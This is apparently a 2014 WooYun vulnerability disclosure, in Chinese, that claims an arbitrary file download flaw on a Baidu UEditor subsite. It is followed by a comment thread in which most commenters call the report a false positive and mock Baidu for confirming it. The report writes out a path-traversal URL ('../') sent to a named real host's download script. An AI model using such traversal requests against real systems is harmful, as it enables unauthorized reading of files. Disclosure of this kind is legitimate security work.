百度某分站任意文件下载

导致任意文件下载地址：http://ueditor.baidu.com/website/download.html#ueditor（软件下载地址）

下载链接：http://ueditor.baidu.com/build/build_down.php?n=ueditor-list.zip

去掉后面的文件名ueditor-list.zip

构造任意文件下载地址：

http://ueditor.baidu.com/build/build_down.php?n=（这里填写文件路径和文件名）

测试：

http://ueditor.baidu.com/build/build_down.php?n=../website/examples/uparsedemo.html

下载后的文件和网页版的对比：

null

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2014-07-10 18:37

厂商回复：

感谢对百度安全的支持。我们已联系业务部门处理。

最新状态：

暂无

1. 2014-07-10 14:50 | xsser ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

   0

   误报

   1# 回复此人

2. 2014-07-10 18:08 | 百度(乌云厂商)

   0

   @xsser 误报还给过，我擦啊

   2# 回复此人

3. 2014-07-10 18:46 | 瘦蛟舞 ( 普通白帽子 | Rank:765 漏洞数:83 | 铁甲依然在)

   0

   @百度 误报还确认，我擦啊

   3# 回复此人

4. 2014-07-10 18:56 | 超威蓝猫 ( 核心白帽子 | Rank:1133 漏洞数:122 | STEAM_0:0:55968383)

   0

   @xsser 误报还给过，百度擦啊

   4# 回复此人

5. 2014-07-10 19:39 | ′ 雨。 ( 普通白帽子 | Rank:1332 漏洞数:198 | Only Code Never Lie To Me.)

   0

   @百度 误报还通过，我擦啊。

   5# 回复此人

6. 2014-07-10 21:01 | 小怿 ( 实习白帽子 | Rank:31 漏洞数:7 | )

   0

   @百度 误报还确认，我擦啊

   6# 回复此人

7. 2014-07-10 23:05 | wefgod ( 核心白帽子 | Rank:1829 漏洞数:183 | 力不从心)

   0

   哈哈

   7# 回复此人

8. 2014-07-11 08:19 | 乐乐、 ( 普通白帽子 | Rank:878 漏洞数:190 )

   0

   @xsser 谁审核的 我擦啊

   8# 回复此人

9. 2014-07-11 15:53 | 小胖胖要减肥 ( 普通白帽子 | Rank:686 漏洞数:101 )

   0

   @百度 擦 那你们还确认

   9# 回复此人

10. 2014-07-12 09:08 | 233 ( 路人 | Rank:14 漏洞数:4 | 小孩子看了根本把持不住)

    0

    误报+确认 全通过 2333 你擦嘞

    10# 回复此人

11. 2014-08-01 00:10 | F4K3R ( 普通白帽子 | Rank:318 漏洞数:34 | 求团队收留。)

    0

    我就喜欢这么欢乐！

    11# 回复此人

12. 2015-02-27 11:27 | 名字xsser ( 路人 | Rank:5 漏洞数:1 | 顺流而下，把梦做完|最近小忙，有问题可以...)

    0

    误报你们擦嘞

    12# 回复此人